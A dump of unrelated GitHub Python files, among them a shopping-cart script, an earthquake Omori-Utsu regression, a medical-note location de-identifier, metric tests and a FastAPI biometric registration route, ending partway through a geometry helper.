{1:'肥皂',2:'牙刷',3:'牙膏',4:'毛巾',5:'卫衣',6:'短袖',7:'长裤',8:'短裤',9:'饮料',10:'零食',11:'鞋子',12:'马自达',13:'劳斯莱斯'}\ngoodsKey = tuple(goods.keys())\ngoodsValue = list(goods.values())\nmoney = {1: 3, 2: 5, 3: 8, 4: 5, 5: 30, 6: 20, 7: 30, 8: 20, 9: 3, 10: 6, 11: 25,12:200000,13:5000000}\nface = {1:'购物',2:'结账',3:'查看余额',4:'购物清单',5:'充值'}\nshop = list()\ncash = 100\n\nfile = open('shopHistory.txt', 'w')\nfile.write('商品列表:')\nfile.write(\"\\n\")\nfor i in goodsValue:\n file.write(str(i))\n file.write(' 
')\nfile.write(\"\\n\")\n\ndef Face():\n print(' ')\n print(face)\n print(' ')\n a = eval(input(\"请选择想要操作的数字:\"))\n if a == 1:\n Shop()\n elif a == 2:\n Pay()\n elif a == 3:\n print(' ')\n print(\"{}元\".format(cash))\n Face()\n elif a == 4:\n Remove()\n elif a == 5:\n Cash()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Face()\n\ndef Shop():\n b = 1\n while b != 0:\n print(' ')\n print(goods)\n print(' ')\n b = eval(input(\"请选择你想购买的商品编号(0:退出):\"))\n shop.append(goodsKey[b-1])\n continue\n shop.pop(-1)\n Face()\n\ndef Pay():\n global cash\n pay = 0\n for m in shop:\n pay = pay + money[m]\n print(' ')\n p = eval(input(\"{}元,是否支付(1:支付,2:返回)\".format(pay)))\n if p == 1:\n if pay < cash:\n file.write('购买商品:')\n file.write(\"\\n\")\n for i in shop:\n file.write((goods[i]))\n file.write(' ')\n file.write(\"\\n\")\n print(' ')\n pa = eval(input(\"支付成功!是否退出(1:退出,2:返回界面)\"))\n cash = cash - pay\n if pa == 1:\n print(' ')\n print(\"祝您生活愉快!\")\n elif pa == 2:\n shop.clear()\n Face()\n else:\n print(' ')\n print(\"输入失败,请重新输入\")\n Pay()\n elif pay >= cash:\n print(' ')\n print(\"余额不足,请充值\")\n Face()\n elif p == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Pay()\n\ndef Cash():\n print(' ')\n c = eval(input(\"请输入充值金额:\"))\n global cash\n cash = cash + c\n print(' ')\n print(\"充值成功!\")\n Face()\n\ndef Remove():\n for i in shop:\n print(goods[i])\n print(' ')\n s = eval(input(\"是否删除商品:(1:是,2:否):\"))\n if s == 1:\n print(' ')\n ss = eval(input(\"请输入想要删除的商品编号:(0:退出)\"))\n try:\n shop.remove(ss)\n except:\n print(' ')\n print(\"该商品不在购物车中\")\n Remove()\n print(' ')\n print(\"删除成功!\")\n Face()\n elif s == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Remove()\ndef main():\n print(' ')\n print(\"《购物车》\")\n Face()\n file.close()\n\nmain()","repo_name":"Dzy0121/Gitspace","sub_path":"shopping.py","file_name":"shopping.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3399076289","text":"# 1835] 카드\n\nfrom collections import deque\nn = int(input())\ndq=deque()\nfor i in range(n,0,-1):\n dq.appendleft(i)\n # dq.rotate()\n for _ in range(i):\n dq.appendleft(dq.pop())\n \nprint(*dq)\n","repo_name":"devryyeong/problem-solving","sub_path":"BOJ/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23484749458","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef GraphOmoriUtsu(df, gap, calcul_OU, ms_max_mag, foreshock):\n\n \"\"\"\n Fonction qui crée un graphe Omori-Utsu et calcule les K- & p-values\n :param df: données (table pandas)\n :param gap: taille des bars d'histograme (en s)\n :param calcul_OU: calcule de la loi OU (1) ou non (0)\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param foreshock: 1 = analyse des précurseurs\n 0 = analyse des répliques\n :return: objet graphe qui trace le nombre de séisme par jour (ligne) et la magnitude max par jour (point)\n Le titre est constitué de la localisation (jour) du main shock ainsi que des K- et p-values calculées\n \"\"\"\n\n nb_gap = int((df['sec'].max() - df['sec'].min()) // gap)\n nt = []\n magmax = []\n title = 'Earthquake number and maximal magnitude per day'\n\n for i in range(nb_gap + 1):\n dfbis = df[((i * gap + 
df['sec'].min()) <= df['sec']) & (((i + 1) * gap + df['sec'].min()) > df['sec'])]\n nt.append(len(dfbis))\n magmax.append(dfbis['mag'].max())\n\n fig, ax1 = plt.subplots()\n x = [i for i in range(nb_gap + 1)]\n # Ordonnée de gauche : # séismes / jour\n color = 'tab:blue'\n ax1.set_xlabel('time (day)')\n ax1.set_ylabel('Earthquake # per day', color=color)\n y = nt\n ax1.plot(x, y, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n # Ordonnée de droite : magnitude max / jour\n ax2 = ax1.twinx()\n color = 'tab:red'\n ax2.set_ylabel('Max magnitude per day', color=color)\n ax2.scatter(x, magmax, s=10, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n if calcul_OU == 1:\n if foreshock == 1:\n a, b, idx_ms = RegressionOU_foreshock(1, nt, ms_max_mag, magmax)\n study = 'foreshocks'\n else:\n a, b, idx_ms = RegressionOU(1, nt, ms_max_mag, magmax)\n study = 'aftershocks'\n\n title = 'Main shock at ' + str(idx_ms) + ' days / p-value (' + study + ') = ' + str(round(-a, 2)) + \\\n ' / K-value = ' + str(round(10 ** b))\n\n ax1.set_title(title)\n fig.tight_layout()\n plt.show()\n\n if calcul_OU == 1:\n return a, b, idx_ms\n\n \ndef RegressionOU(c, nt, ms_max_mag, magmax):\n\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des répliques\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n t = [(idx_ms + i) for i in range(len(nt) - idx_ms)]\n x = []\n y = []\n for i in range(len(nt) - idx_ms):\n if nt[i + idx_ms] != 0:\n y.append(np.log10(nt[i + idx_ms]))\n x.append(np.log10(c + t[i]))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n\ndef RegressionOU_foreshock(c, nt, ms_max_mag, magmax):\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des précurseurs\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n x = []\n y = []\n for i in range(idx_ms):\n if nt[i] != 0:\n y.append(np.log10(nt[i]))\n x.append(np.log10(c + i))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n \nif __name__ == '__main__':\n\n df = pd.read_csv('../data_SNat/CDSA_SeulementEssaimSaintes_2004-2005.txt', sep=\"\\s+\")\n\n # 1 jour = 86 400 sec\n gap = 3600 * 24\n # Calcul de p et K\n GraphOmoriUtsu(df, gap, 1, 1, 
0)","repo_name":"Skaddd/GeoScience","sub_path":"Codes_Graphes/OmoriUtsu.py","file_name":"OmoriUtsu.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5302017354","text":"import re\nimport sys\nimport locationtagger\nfrom nltk.tag import pos_tag\n\n\"\"\"\nFrank Chien\nAssignment 8 - de-identification\n10/15/21\n\nThis script adapts the phone tagger patient information de-identification algorithm.\nThe chosen category for this assignment is 'locations'.\nIn the deid_phone function, instead of calling check_for_phone this script will call check_for_location.\nThe check_for_location function represents my work.\n\nInstead of the approach used in the PELR script, this assignment uses a natural language processing approach.\nThe strategy for location PHI identification is as follows:\n1) use location tagger to identify locations\n2) use nltk part of speech tagging to identify proper nouns\n3) the intersection of locations and proper nouns is flagged as location PHI\n\nThe reason proper nouns were used as a requirement is that words such as \"home\" or \"hospital\" would\nbe (correctly) tagged as locations; however, they do not offer identifiable patient information.\nLocations such as \"Calvert\" or \"Boston\", for instance, would be identifiable information and are proper nouns.\n\nOne difficulty this strategy encountered was that its sensitivity and specificity rely on the performance\nof both the location tagger and the part of speech tagger. Since the input was medical documentation, which includes\nspecific language, syntax, symbols, and abbreviations which are not seen in other domains of common English, the\nnatural language processing components had difficulty. For example, \"Aline\" was frequently tagged as a location, whereas\nphysicians/nurses would understand 'aline' as an arterial line, a piece of medical equipment. Another example is that\nsome notes were written in all-caps. The NLTK POS tagger relies on capitalization to identify proper nouns, thus\nfor these notes, many tokens were incorrectly tagged as 'NNP', or proper noun.\n\nIn summary, using a natural language processing approach to medical note de-identification is a challenge due to the difficulty in parsing medical language with NLP tools,\nwhich can be very different syntactically and in lexicon from common English.\n\nUnfortunately, the performance of this NLP strategy as implemented is poor. Though the algorithm detected some locations correctly\n(56 true positives), the numbers of false positives and false negatives were great (816 and 311, respectively). A large number of\ntokens were incorrectly identified as a location (such as \"aline\") and further, incorrectly tagged as proper nouns.\nThis exercise has been a demonstration both of how medical record de-identification works and of the difficulty in\nanalyzing medical texts as natural language.\n\nThe location tagger was obtained at\nhttps://pypi.org/project/locationtagger/\n\"pip install locationtagger\" was run on the terminal to install the location tagger.\nFollowing the instructions from the website, the command \"python -m spacy download en\" was required.\nThe location tagger is maintained by kaushiksoni10 and has an open source license.\nPer the website, \"OSI approved::MIT license\".\n\nPart of speech tagging was achieved through the NLTK tagger pos_tag. 
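Given the write-up above, the heart of check_for_location is a single filter: keep tokens that locationtagger reports as places and that NLTK tags as proper nouns. A condensed sketch (the sample sentence is invented, and the usual NLTK tagger models are assumed to be installed):

import locationtagger
from nltk.tag import pos_tag

def location_phi(chunk: str):
    places = locationtagger.find_locations(text=chunk)
    known = {p.lower() for p in places.countries + places.regions + places.cities}
    # a token is flagged only if it is both a tagged location and an NNP
    return [tok for tok, tag in pos_tag(chunk.split())
            if tag == 'NNP' and tok.lower() in known]

# location_phi('Patient transferred from Boston General to home.')
# -> ['Boston']; 'home' fails both tests, as discussed above.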
\n\n\"\"\"\n\ndef check_for_phone(patient,note,chunk, output_handle):\n #ths is the original code written by Clifford Lab\n \"\"\"\n Inputs:\n - patient: Patient Number, will be printed in each occurance of personal information found\n - note: Note Number, will be printed in each occurance of personal information found\n - chunk: one whole record of a patient\n - output_handle: an opened file handle. The results will be written to this file.\n to avoid the time intensive operation of opening and closing the file multiple times\n during the de-identification process, the file is opened beforehand and the handle is passed\n to this function. \n Logic:\n Search the entire chunk for phone number occurances. Find the location of these occurances \n relative to the start of the chunk, and output these to the output_handle file. \n If there are no occurances, only output Patient X Note Y (X and Y are passed in as inputs) in one line.\n Use the precompiled regular expression to find phones.\n \"\"\"\n # The perl code handles texts a bit differently, \n # we found that adding this offset to start and end positions would produce the same results\n offset = 27\n\n # For each new note, the first line should be Patient X Note Y and then all the personal information positions\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n\n # search the whole chunk, and find every position that matches the regular expression\n # for each one write the results: \"Start Start END\"\n # Also for debugging purposes display on the screen (and don't write to file) \n # the start, end and the actual personal information that we found\n\n\n for match in ph_reg.finditer(chunk):\n \n # debug print, 'end=\" \"' stops print() from adding a new line\n print(patient, note,end=' ')\n print((match.start()-offset),match.end()-offset, match.group())\n \n # create the string that we want to write to file ('start start end') \n result = str(match.start()-offset) + ' ' + str(match.start()-offset) +' '+ str(match.end()-offset) \n \n # write the result to one line of output\n output_handle.write(result+'\\n')\n\n\ndef check_for_location(patient,note,chunk, output_handle):\n #this is the function wrote by Frank Chien for the assignment\n #please see comment above for description of the strategy\n\n offset = 27 #identified offset required by clifford lab\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n #print(patient, note) #allows us to see how many notes the algorithm has worked through\n \n #using the location tagger \n locations = locationtagger.find_locations(text = chunk) #locationtagger returns a location object\n all_locations = locations.countries + locations.regions + locations.cities #location objects stores locations in 3 places, as countries, locations, and cities\n \n #using the NLTK part of speech tagger\n tagged_chunk = pos_tag(chunk.split()) #first split into tokens, then tag\n\n for location in all_locations: #iterates through identified locations\n for token_pos in tagged_chunk: #looks for location in list of tagged tokens. 
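One caveat with the lookup in this loop: the matched token is handed to re.finditer as a raw pattern, so a location containing a regex metacharacter (e.g. "St.") would match more than intended. Escaping the literal sidesteps that; a sketch:

import re

def occurrences(substring: str, chunk: str):
    # re.escape makes '.' literal; unescaped, 'St.' would also match 'Sto'
    return [m.start() for m in re.finditer(re.escape(substring), chunk)]

assert occurrences('St.', 'St. Louis and Stone') == [0]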
token_pos is a tuple: (token, part of speech tag)\n if location.lower() == token_pos[0].lower(): #to match location to token, only lower cases are used\n if token_pos[1]=='NNP': #if the token is a proper noun, we have identified a possible location PHI\n substring=token_pos[0] \n indices=[_.start() for _ in re.finditer(substring,chunk)] #uses a regex to identify all instances of the location within the chunk\n for start_pos in indices: #composes the result line to be written to the output file\n start_pos = start_pos - offset \n end_pos = start_pos + len(substring)\n result = str(start_pos) + ' ' + str(start_pos) + ' '+ str(end_pos)\n\n output_handle.write(result+'\\n') #writes result to output file\n\n break #break the loop and check for the next location token. The regex iterator will already obtain all instances of the location in the chunk.\n \n \n \ndef deid_phone(text_path= 'id.text', output_path = 'phone.phi'):\n \n \"\"\"\n Inputs: \n - text_path: path to the file containing patient records\n - output_path: path to the output file.\n \n Outputs:\n for each patient note, the output file will start with a line declaring the note in the format of:\n Patient X Note Y\n then for each phone number found, it will have another line in the format of:\n start start end\n where the start is the start position of the detected phone number string, and end is the detected\n end position of the string, both relative to the start of the patient note.\n If there is no phone number detected in the patient note, only the first line (Patient X Note Y) is printed\n to the output\n Screen Display:\n For each phone number detected, the following information will be displayed on the screen for debugging purposes \n (these will not be written to the output file):\n start end phone_number\n where `start` is the start position of the detected phone number string, and `end` is the detected end position of the string,\n both relative to the start of the patient note.\n \n \"\"\"\n # start of each note has the pattern: START_OF_RECORD=PATIENT||||NOTE||||\n # where PATIENT is the patient number and NOTE is the note number.\n start_of_record_pattern = r'^start_of_record=(\\d+)\\|\\|\\|\\|(\\d+)\\|\\|\\|\\|$'\n\n # end of each note has the pattern: ||||END_OF_RECORD\n end_of_record_pattern = r'\\|\\|\\|\\|END_OF_RECORD$'\n\n # open the output file just once to save time on the time-intensive IO\n with open(output_path,'w+') as output_file:\n with open(text_path) as text:\n # initialize an empty chunk. 
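# Aside: the re.finditer(substring, chunk) call in check_for_location above
# treats the matched token as a regular expression. A safer sketch (an
# improvement suggestion, not what this script does) escapes the token and
# anchors on word boundaries so it cannot match inside longer words:
#
#     pattern = r'\\b' + re.escape(substring) + r'\\b'
#     indices = [m.start() for m in re.finditer(pattern, chunk)]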
Go through the input file line by line\n # whenever we see the start_of_record pattern, note patient and note numbers and start \n # adding everything to the 'chunk' until we see the end_of_record.\n chunk = ''\n #remove later\n # counter=0\n for line in text:\n record_start = re.findall(start_of_record_pattern,line,flags=re.IGNORECASE)\n if len(record_start):\n patient, note = record_start[0]\n chunk += line\n\n # check to see if we have seen the end of one note\n record_end = re.findall(end_of_record_pattern, line,flags=re.IGNORECASE)\n\n if len(record_end):\n # Now we have a full patient note stored in `chunk`, along with patient number and note number\n # pass all to check_for_phone to find any phone numbers in note.\n\n #check_for_phone(patient,note,chunk.strip(), output_file)\n check_for_location(patient, note, chunk.strip(), output_file)\n # counter+=1\n # if(counter>0):\n # break\n\n #this is the one we need to modify above - \n \n # initialize the chunk for the next note to be read\n chunk = ''\n\n \nif __name__ == \"__main__\":\n print(sys.prefix)\n deid_phone(sys.argv[1], sys.argv[2])\n \n","repo_name":"thisishcb/BMI500_HW8_Deid_Date","sub_path":"python/deid-FrankChien.py","file_name":"deid-FrankChien.py","file_ext":"py","file_size_in_byte":10776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"22077981767","text":"def read_data(data_path):\n \"\"\"\n Reads data\n \"\"\"\n heightmap = []\n f = open(data_path, \"r\")\n for x in f:\n heightmap.append([int(h) for h in x.strip()])\n return heightmap\n\n\ndef is_lowest(heightmap, i, j):\n \"\"\"\n Searches for the lowest point\n \"\"\"\n height = heightmap[i][j]\n if (j > 0) and (heightmap[i][j - 1] <= height):\n return False\n if (j < len(heightmap[i]) - 1) and (heightmap[i][j + 1] <= height):\n return False\n if (i > 0) and (heightmap[i - 1][j] <= height):\n return False\n if (i < len(heightmap) - 1) and (heightmap[i + 1][j] <= height):\n return False\n return True\n\n\ndef basin_size(hmap, i, j):\n \"\"\"\n Calculates basin size\n \"\"\"\n\n # Initialize sets and add first point\n basin = set()\n current = set()\n basin.add((i, j))\n current.add((i, j))\n new = current\n\n # Do while there are new points\n while len(new) > 0:\n new = set()\n # Look around the points in new and add them to basin and new\n for point in current:\n for [x, y] in [[1, 0], [0, 1], [-1, 0], [0, -1]]:\n if point[0] + y >= 0 and point[1] + x >= 0:\n if point[0] + y < len(hmap):\n if point[1] + x < len(hmap[point[0] + y]):\n if hmap[point[0] + y][point[1] + x] < 9:\n point_new = (point[0] + y, point[1] + x)\n if point_new not in basin:\n basin.add(point_new)\n new.add(point_new)\n # Update sets\n current = new\n return len(basin)\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n heightmap = read_data(data_path)\n\n # Basin evaluation\n risk = 0\n basins = []\n\n for i in range(len(heightmap)):\n for j in range(len(heightmap[i])):\n if is_lowest(heightmap, i, j):\n risk += heightmap[i][j] + 1\n basins.append(basin_size(heightmap, i, j))\n\n print(f\"Total risk is {risk}\")\n basins.sort()\n print(f\"Multiplied sizes {basins[-1] * basins[-2] * basins[-3]}\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73640380524","text":"import json\nfrom functions.validate import validate_event\n\ndef 
validate(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n response = validate_event(event, context)\n return response\n\ndef process(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n return {\n \"body\": \"been processed ty\"\n }\n\ndef hello(event, context):\n body = {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"input\": event\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","repo_name":"Mac-lp3/stepy","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17299939043","text":"from hamcrest import assert_that, close_to, has_items, has_length\nfrom numpy import nanmean\n\nfrom deepchecks.vision import VisionData\nfrom deepchecks.vision.metrics_utils.detection_precision_recall import ObjectDetectionAveragePrecision\nfrom deepchecks.vision.metrics_utils.scorers import calculate_metrics\nfrom deepchecks.vision.metrics_utils.semantic_segmentation_metrics import MeanDice, MeanIoU, per_sample_dice\n\n\ndef test_default_ap_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AveragePrecision': ObjectDetectionAveragePrecision()},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res.keys(), has_length(1))\n assert_that(res['AveragePrecision'], has_length(80))\n\n\ndef test_ar_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AverageRecall': ObjectDetectionAveragePrecision(return_option='ar')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n\n assert_that(res.keys(), has_length(1))\n assert_that(res['AverageRecall'], has_length(80))\n\n\ndef test_equal_pycocotools(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n metric = ObjectDetectionAveragePrecision(return_option=None)\n for batch in coco_test_visiondata:\n label = coco_test_visiondata.batch_to_labels(batch)\n prediction = coco_test_visiondata.infer_on_batch(batch, mock_trained_yolov5_object_detection, device)\n metric.update((prediction, label))\n res = metric.compute()[0]\n\n assert_that(metric.get_classes_scores_at(res['precision'], area='all', max_dets=100), close_to(0.409, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.5, area='all', max_dets=100),\n close_to(0.566, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.75, area='all', max_dets=100),\n close_to(0.425, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='small', max_dets=100), close_to(0.212, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='medium', max_dets=100), close_to(0.383, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='large', max_dets=100), close_to(0.541, 0.001))\n\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=1), close_to(0.330, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', 
max_dets=10), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=100), close_to(0.429, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='small', max_dets=100), close_to(0.220, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='medium', max_dets=100), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100), close_to(0.549, 0.001))\n\n # unrelated to pycoco but needed to check another param\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100, get_mean_val=False,\n zeroed_negative=False), has_items([-1]))\n assert_that(metric.get_classes_scores_at(res['recall'], get_mean_val=False, zeroed_negative=False), has_items([-1]))\n\n\ndef test_average_precision_recall(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(),\n 'ap_macro': ObjectDetectionAveragePrecision(average='macro'),\n 'ap_weighted': ObjectDetectionAveragePrecision(average='weighted')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n # classes mean and macro are not equal due to zeroed negative\n assert_that(nanmean(res['ap']), close_to(0.396, 0.001))\n assert_that(res['ap_macro'], close_to(0.409, 0.001))\n assert_that(res['ap_weighted'], close_to(0.441, 0.001))\n\n\ndef test_average_precision_thresholds(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(iou_range=(0.4, 0.8, 5), average='macro')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res['ap'], close_to(0.514, 0.001))\n\n\ndef test_segmentation_metrics(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model,\n device):\n dice_per_class = MeanDice()\n dice_micro = MeanDice(average='micro')\n dice_macro = MeanDice(average='macro')\n iou_per_class = MeanIoU()\n iou_micro = MeanIoU(average='micro')\n iou_macro = MeanIoU(average='macro')\n\n for batch in segmentation_coco_train_visiondata:\n label = segmentation_coco_train_visiondata.batch_to_labels(batch)\n prediction = segmentation_coco_train_visiondata.infer_on_batch(\n batch, trained_segmentation_deeplabv3_mobilenet_model, device)\n dice_per_class.update((prediction, label))\n dice_micro.update((prediction, label))\n dice_macro.update((prediction, label))\n iou_per_class.update((prediction, label))\n iou_micro.update((prediction, label))\n iou_macro.update((prediction, label))\n assert_that(dice_per_class.compute()[0], close_to(0.973, 0.001))\n assert_that(dice_per_class.compute(), has_length(17))\n assert_that(dice_micro.compute(), close_to(0.951, 0.001))\n assert_that(dice_macro.compute(), close_to(0.649, 0.006))\n assert_that(iou_per_class.compute()[0], close_to(0.948, 0.001))\n\n\ndef test_per_sample_dice(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model, device):\n batch = next(iter(segmentation_coco_train_visiondata))\n predictions = segmentation_coco_train_visiondata.infer_on_batch(batch,\n trained_segmentation_deeplabv3_mobilenet_model,\n device)\n labels = batch[1]\n res = per_sample_dice(predictions, labels)\n assert_that(sum(res), close_to(9.513, 
0.001))\n","repo_name":"cmendozab/deepchecks","sub_path":"tests/vision/utils_tests/metrics_test.py","file_name":"metrics_test.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"4727400977","text":"from fastapi import APIRouter, Depends, status, HTTPException, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom sqlalchemy.orm import Session\nimport numpy as np\nimport random\nimport time\nimport cv2\nimport os\n\nfrom core.face import FaceRecognition\nfrom core.iris import IrisRecognition\nfrom core.setting import *\nfrom server import database, models\n\nfrom pydantic import BaseModel\nfrom typing import Union\n\n\n# An instance of face-recognition\ninstace_face = FaceRecognition(MODELS, METRICS)\ninstace_iris = IrisRecognition()\n\n# Set router\nrouter = APIRouter(\n tags=['Add New User'],\n prefix=\"/add\"\n)\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add(\n name_user : str, \n face_file : UploadFile = File(description=\"Upload Face image\"),\n iris_file_1 : UploadFile = File(description=\"Upload Iris 1 image\"),\n iris_file_2 : UploadFile = File(description=\"Upload Iris 2 image\"),\n db: Session = Depends(database.get_db)\n ):\n\n\n\n # Read image contents\n try:\n face_contents = await face_file.read()\n iris_1_contents = await iris_file_1.read()\n iris_2_contents = await iris_file_2.read()\n\n # Make image format in opencv and save temporal image\n name = f'./temporal/{time.time()}_{int(random.random()*1000)}'\n\n nparr = np.fromstring(face_contents, np.uint8)\n face_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_face.png', face_img)\n\n nparr = np.fromstring(iris_1_contents, np.uint8)\n iris_1_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_1.png', iris_1_img)\n\n nparr = np.fromstring(iris_2_contents, np.uint8)\n iris_2_img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n cv2.imwrite(name+'_iris_2.png', iris_2_img)\n except:\n return {\"detail\" : \"Error in reading data\"}\n\n # Embedding all images\n try:\n face_embed = instace_face.embedding(name+'_face.png')\n iris_1_embed = instace_iris.embedding(name+'_iris_1.png')\n iris_2_embed = instace_iris.embedding(name+'_iris_2.png')\n\n # Remove files\n os.remove(name+'_face.png')\n os.remove(name+'_iris_1.png')\n os.remove(name+'_iris_2.png')\n except:\n return {\"detail\": \"Error in embedding\"}\n\n # Add new User \n try:\n new_user = models.User(name=name_user, face=str(face_embed['Facenet']), iris_1= str(iris_1_embed), iris_2= str(iris_2_embed))\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return {\"detail\" : f\"Information accepted and pushed to databse with name ({name_user})\"}\n except:\n return {\"detail\" : \"Problem in adding user to database\"}\n \n","repo_name":"mertz1999/Dual-Authentication","sub_path":"server/routers/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"19"} +{"seq_id":"70520972845","text":"import numpy as np\r\nfrom shapely import LineString\r\nfrom shapely import Point\r\nfrom shapely import line_interpolate_point\r\n\r\n\r\ndef get_unit_vector(a: np.array, b: np.array) -> np.array:\r\n \"\"\"get the unit vector point in the direction point A -> point B\"\"\"\r\n vector = np.subtract(b, a)\r\n unit_v = vector / np.linalg.norm(vector)\r\n if not 0.99 < np.linalg.norm(unit_v) < 1.01:\r\n raise ValueError\r\n 
return unit_v[0]\r\n\r\n\r\ndef rotate_90_deg(start_point: np.array, end_point: np.array, clockwise: bool) -> np.array:\r\n \"\"\"find the coordinates of the end_point\r\n - rotated 90 degrees around the start point,\r\n - in the given direction (clockwise or counterclockwise)\r\n \"\"\"\r\n vector = np.subtract(end_point, start_point)\r\n\r\n if clockwise:\r\n rot = np.array([[0, 1], [-1, 0]])\r\n return start_point + vector @ rot\r\n else:\r\n rot = np.array([[0, -1], [1, 0]])\r\n return start_point + vector @ rot\r\n\r\n\r\nclass PlineString(LineString):\r\n\r\n def __init__(self, *args, left_clockwise=True, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n # if true, clockwise turn from the first point is left\r\n self.left_clockwise = left_clockwise\r\n\r\n def point_at_distance(self, d: float) -> Point:\r\n \"\"\"interpolate a point at a given distance from the starting point of the linestring\"\"\"\r\n point = line_interpolate_point(self, d)\r\n assert isinstance(point, Point)\r\n return point\r\n\r\n def get_perpendicular_unit_vector(self, d: float, left=True, delta=10):\r\n \"\"\"get a unit vector\r\n - locally perpendicular to the plinestring at +- delta units\r\n - at the point at distance d\r\n - in the given direction (left or right)\r\n \"\"\"\r\n\r\n # create a local segment from d to d+delta to find the perpendicular to\r\n point = 